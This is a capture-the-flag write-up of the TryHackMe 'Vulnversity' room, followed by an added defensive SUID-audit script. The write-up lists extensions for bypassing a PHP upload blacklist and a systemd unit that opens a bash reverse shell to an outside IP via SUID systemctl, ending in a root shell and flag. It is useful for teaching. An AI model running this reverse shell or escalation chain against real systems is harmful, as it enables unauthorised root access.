tryhackme--Vulnversity
File upload blacklist bypass
On a PHP server where uploading .php files is blocked, the following file extensions can be tried:
.php
.php3
.php4
.php5
.phtml
Privilege escalation
- Find files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
The output shows that /bin/systemctl has the SUID bit set:
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
- Create the service file
server1:/etc/systemd/system # cat /etc/systemd/system/test.service
[Unit]
Description=example systemd service unit file.
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.4.30.149/4444 0>&1'
[Install]
WantedBy=multi-user.target
- Create the symlink
systemctl link /tmp/test.service
- Start the service
systemctl start test.service
- Get a shell
──(root💀kali)-[~/桌面/thm/3]
└─# nc -l -p 4444 -vv
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.234.90.
Ncat: Connection from 10.10.234.90:49430.
bash: cannot set terminal process group (1884): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnuniversity:/# whoami
whoami
root
root@vulnuniversity:/# cd ~
cd ~
root@vulnuniversity:/root# ls
ls
root.txt
root@vulnuniversity:/root# cat root.txt
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5
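
From the defender's side, the same find output can be audited automatically. The script below is an added example, not part of the original write-up: it flags SUID binaries that can run commands as their owner and any path missing from an expected baseline. The BASELINE and RISKY_NAMES lists and the sample input are assumptions built from a few paths in the listing above.

```shell
#!/bin/sh
# Added example: audit SUID binaries against a baseline.
# Both lists are illustrative assumptions; build the baseline from a clean install.

# Binaries that must never be SUID: they can execute arbitrary commands or units.
RISKY_NAMES="systemctl bash find vim"

# SUID paths expected on this (hypothetical) host.
BASELINE="/usr/bin/sudo
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping"

# audit_suid: reads one path per line on stdin and prints
#   RISKY <path>       name is on the never-SUID list
#   UNEXPECTED <path>  path is not in the baseline
audit_suid() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    name=${path##*/}
    case " $RISKY_NAMES " in
      *" $name "*) printf 'RISKY %s\n' "$path"; continue ;;
    esac
    # Exact, fixed-string, whole-line match against the baseline.
    if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
      printf 'UNEXPECTED %s\n' "$path"
    fi
  done
}

# Constructed sample input: a subset of the find output shown above.
sample_scan() {
  printf '%s\n' /usr/bin/sudo /usr/bin/passwd /bin/su /bin/mount \
    /bin/systemctl /usr/lib/squid/pinger /bin/ping
}

# On a live host: find / -perm -u=s -type f 2>/dev/null | audit_suid
sample_scan | audit_suid
```

systemctl is not SUID on a stock install; clearing the bit with chmod u-s /bin/systemctl removes the escalation path shown above.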
